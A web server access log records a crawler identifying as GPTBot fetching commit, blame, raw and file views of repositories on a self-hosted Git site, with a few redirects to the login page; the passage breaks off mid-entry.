200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/init_db.py" [Client 74.7.227.38] [Length 16899] [Gzip 8.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/init_db.py" -[17/Feb/2026:16:39:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/init_db.py" [Client 74.7.227.38] [Length 9830] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/init_db.py" -[17/Feb/2026:16:39:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/init_db.py" [Client 74.7.227.38] [Length 5009] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/init_db.py" -[17/Feb/2026:16:39:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/init_db.py" [Client 74.7.227.38] [Length 943] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/init_db.py" -[17/Feb/2026:16:39:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fGoldMonitor_v4.7.py" [Client 74.7.227.38] [Length 33095] [Gzip 6.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.7.py" -[17/Feb/2026:16:39:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fGoldMonitor_v5.1.spec" [Client 74.7.227.38] [Length 25851] [Gzip 4.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v5.1.spec" -[17/Feb/2026:16:39:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 9971] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:16:39:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 9972] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:16:39:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 9969] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:16:39:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 9973] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:16:39:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 9972] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:16:39:54 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/init_db.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/init_db.py" -[17/Feb/2026:16:39:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/init_db.py" -[17/Feb/2026:16:39:54 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/init_db.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/init_db.py" -[17/Feb/2026:16:39:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/init_db.py" -[17/Feb/2026:16:39:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 10002] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:16:39:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 10004] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:16:39:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 10002] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:16:39:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 10006] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:16:39:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 10002] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:16:39:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 11351] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:16:39:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 11351] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:16:39:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 11351] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:16:39:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 11351] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:16:40:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 11350] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:16:40:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 10278] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:16:40:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 9960] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/query" -[17/Feb/2026:16:40:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/query" -[17/Feb/2026:16:40:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 9959] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/query" -[17/Feb/2026:16:40:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 9961] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/query" -[17/Feb/2026:16:40:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 9959] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/query" -[17/Feb/2026:16:40:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 9981] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:16:40:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 9983] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:16:40:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 9982] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:16:40:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 9981] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:16:40:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 9979] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:16:40:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 9948] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:16:40:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 11321] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:16:40:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 144] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:16:40:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 10266] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:16:40:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 9978] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:16:40:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 10264] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:16:40:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 144] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:16:40:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 10263] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:16:40:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 10264] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:16:40:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 144] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:16:40:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 144] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:16:40:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 144] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:16:40:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json?display=rendered" [Client 74.7.227.38] [Length 11125] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:16:40:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 10238] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like 